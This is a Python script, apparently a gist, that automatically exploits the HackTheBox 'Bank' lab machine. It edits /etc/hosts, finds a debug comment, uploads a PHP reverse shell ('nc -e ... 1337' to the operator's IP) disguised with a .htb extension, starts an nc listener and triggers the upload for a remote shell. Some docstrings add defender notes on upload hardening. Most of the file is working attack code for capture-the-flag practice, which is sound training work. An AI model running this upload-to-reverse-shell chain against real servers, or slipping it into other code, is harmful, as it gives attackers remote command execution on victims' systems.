@dipa96
Last active June 5, 2023 17:20
Auto-Root Python script for HTB Bank machine from HackTheBox
#!/usr/bin/python3.9
"""
htb_bank.py
Author: Donato Di Pasquale (dipa)
Description: Auto-Root Python script for HTB Bank machine from HackTheBox
Tech Stack Info: Support python3.9 and below
Usage: sudo python3.9 htb_bank.py -t <target> -i <your ip>
"""
import argparse
import requests
from bs4 import BeautifulSoup, Comment
import secrets
import subprocess
import threading
import time
import colorama
from colorama import Fore
# Local HTTP proxy endpoint on 127.0.0.1:8080 (presumably an intercepting
# proxy used while debugging). No request in this file passes it through
# the proxies= argument, so as written no traffic is routed through it.
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080",
}
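def parse_arguments():
    """Parse the command-line options for this script.

    Both options are mandatory. Every later step concatenates
    ``args.target`` or ``args.ips`` into a string, so a missing option
    would otherwise surface as a ``TypeError`` far away from its cause;
    with ``required=True`` argparse rejects the call up front.

    Returns:
        argparse.Namespace with ``target`` (address of the lab machine)
        and ``ips`` (address of the operator's own host), both as str.
    """
    parser = argparse.ArgumentParser(description="HackTheBox Bank Exploit, run this exploit as root")
    parser.add_argument(
        "-t",
        "--target",
        type=str,
        required=True,
        help="Target address (also written to /etc/hosts as bank.htb)",
    )
    parser.add_argument("-i", "--ips", type=str, required=True, help="Your Host")
    return parser.parse_args()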
"""
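1. Check that the host is reachable on port 80. -> checkHost()
2. Add bank.htb to /etc/hosts and delete it after the script ends (note: the code below only appends the entry; no removal step is implemented, so the line has to be removed by hand). -> writeEtcHosts(args)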
"""
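def checkHost(args):
    """Send one GET to http://<target> and report whether it answered 200.

    Args:
        args: parsed options; only ``args.target`` is read.

    Returns:
        None when the final response has status 200, 1 otherwise
        (any other status, or the request could not be completed).
    """
    print(Fore.YELLOW + "[DEBUG] Target entered: " + args.target + Fore.RESET)
    print(Fore.YELLOW + "[DEBUG] Send request to http://" + args.target + Fore.RESET)
    try:
        req = requests.get("http://" + args.target, timeout=5)
    except requests.RequestException:
        # Refused connection, timeout or name failure: report it like any
        # other unreachable target instead of ending in a traceback.
        print(Fore.RED + "[ERROR] Target Not Found" + Fore.RESET)
        return 1
    if req.status_code == 200:
        print(Fore.GREEN + "[OK] " + args.target + " Target status code 200 OK" + Fore.RESET)
        return None
    print(Fore.RED + "[ERROR] Target Not Found" + Fore.RESET)
    return 1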
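def writeEtcHosts(args):
    """Append a tab-separated ``<target> bank.htb`` line to /etc/hosts.

    The function only appends. Nothing in it removes the line again, and
    every run adds another copy, so the entry has to be cleaned up by hand.

    ``args.target`` is checked to be an IP literal before it is written:
    the file is system-wide and opened with root privileges, and a value
    containing whitespace or a newline would otherwise add extra entries.

    Args:
        args: parsed options; only ``args.target`` is read.

    Returns:
        The host name "bank.htb", whether or not the write succeeded.
    """
    import ipaddress  # function-scope import keeps the file's import block untouched

    dns = "bank.htb"
    print(Fore.YELLOW + "[DEBUG] Try to setting up new dns record " + dns + " in /etc/hosts file" + Fore.RESET)
    try:
        ipaddress.ip_address(args.target)
    except ValueError:
        print(Fore.RED + "[ERROR] Target is not an IP address, /etc/hosts left unchanged" + Fore.RESET)
        return dns
    try:
        # The context manager flushes and closes the handle on every path.
        with open("/etc/hosts", "a") as hosts:
            hosts.write(args.target + "\t" + dns + "\n")
    except OSError as e:
        print(Fore.RED + "[ERROR]", type(e).__name__ + Fore.RESET)
        if isinstance(e, PermissionError):
            print(Fore.RED + "[ERROR] Run this exploit as root!" + Fore.RESET)
    else:
        # Success is reported only when the write went through; the
        # original printed this from a finally clause, i.e. also on failure.
        print(Fore.GREEN + "[OK] " + args.target + " successful added to /etc/hosts" + Fore.RESET)
    return dns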
"""
3. Print foothold in HTML. -> findingFoothold(args, dns)
4. Load reverse shell in file upload (.htb extension). -> exploit(args,dns)
5. Reverse Shell. -> exploit(args,dns)
"""
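def findingFoothold(args, dns):
    """Print every HTML comment on /support.php that contains "[DEBUG]".

    The request is sent with redirects disabled and the body of that first
    response is parsed, so whatever markup the server returns alongside a
    redirect is what gets inspected. For a defender this is the point to
    check: a page that redirects should not also emit its content, and
    developer notes should not ship in HTML comments.

    Args:
        args: parsed options; not used here, kept for a uniform signature.
        dns: host name to query (the value returned by writeEtcHosts).
    """
    # Don't follow redirects; the timeout matches checkHost so an
    # unresponsive server cannot hang the script here.
    req = requests.get("http://" + dns + "/support.php", allow_redirects=False, timeout=5)
    soup = BeautifulSoup(req.text, 'html.parser')
    comments = soup.find_all(string=lambda node: isinstance(node, Comment))
    for comment in comments:
        if "[DEBUG]" in comment:
            print(Fore.BLUE + "[INFO] Suspicious comment in HTML: " + comment + Fore.RESET)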
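def exploit(args,dns):
    """Upload a PHP file with a ``.htb`` extension and request it back.

    Steps, unchanged from the published script: write the payload to a
    randomly named local file, POST it to /support.php as ``fileToUpload``,
    start a local ``nc`` listener on port 1337 in a thread, then GET the
    uploaded file from /uploads/. The payload string is kept exactly as
    published.

    Defender's view of the same sequence: a multipart POST to /support.php
    carrying a ``.htb`` file whose content is PHP, a GET for
    /uploads/<8 hex chars>.htb, and (if the server runs the file) the web
    server account spawning ``nc`` with a connection to port 1337. The
    corresponding hardening is an upload allowlist checked on content as
    well as extension, an uploads directory that is never handed to the
    script interpreter, and no debug-only handler mappings in production.
    NOTE(review): that the server treats ``.htb`` as PHP is inferred from
    the script's own step list, not shown in this file.

    Args:
        args: parsed options; only ``args.ips`` is read.
        dns: host name of the target site.
    """
    print(Fore.YELLOW + "[DEBUG] Setting up PHP Reverse Shell" + Fore.RESET)
    fileName = secrets.token_hex(nbytes=4) + ".htb"
    print(Fore.YELLOW + "[DEBUG] Load file: " + fileName + Fore.RESET)
    malicious_file = ("<?php exec(\'nc -e /var/htb/bin/emergency " + args.ips + " 1337\') ?>")
    # Context managers close both handles; the original left the read
    # handle open for the rest of the process. The payload file itself
    # still remains in the working directory afterwards.
    with open(fileName, "w") as payload_out:
        payload_out.write(malicious_file)
    print(Fore.YELLOW + "[DEBUG] Setting up HTTP POST Request" + Fore.RESET)
    values = {'title':"test", 'message':'test', 'submitadd':''}
    print(Fore.YELLOW + "[DEBUG] Send payload and waiting for reverse shell..."+ Fore.RESET)
    with open(fileName, "rb") as payload_in:
        # verify=False has no effect on a plain http:// URL; it would only
        # matter (by disabling certificate checks) if the request were
        # redirected to https. Kept so behaviour is unchanged.
        requests.post(
            "http://" + dns + "/support.php",
            files={'fileToUpload': payload_in},
            data=values,
            verify=False,
        )

    def run_listener():
        # Fixed argument list: no shell is needed to start the listener.
        nc_process = subprocess.Popen(["nc", "-lnvp", "1337"])
        nc_process.wait()

    def run_reverse():
        requests.get("http://" + dns + "/" + "/uploads/" + fileName)

    listener_thread = threading.Thread(target=run_listener)
    listener_thread.start()
    run_reverse()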
def main():
    """Run the script's steps in their fixed order.

    The value returned by checkHost is not inspected, so the remaining
    steps (including the /etc/hosts write) run even when the reachability
    check reported a failure.
    """
    options = parse_arguments()
    checkHost(options)
    hostname = writeEtcHosts(options)
    findingFoothold(options, hostname)
    exploit(options, hostname)


if __name__ == "__main__":
    main()
"""
Box URL: https://app.hackthebox.com/machines/Bank
Box writeup: https://0xdf.gitlab.io/2020/07/07/htb-bank.html
"""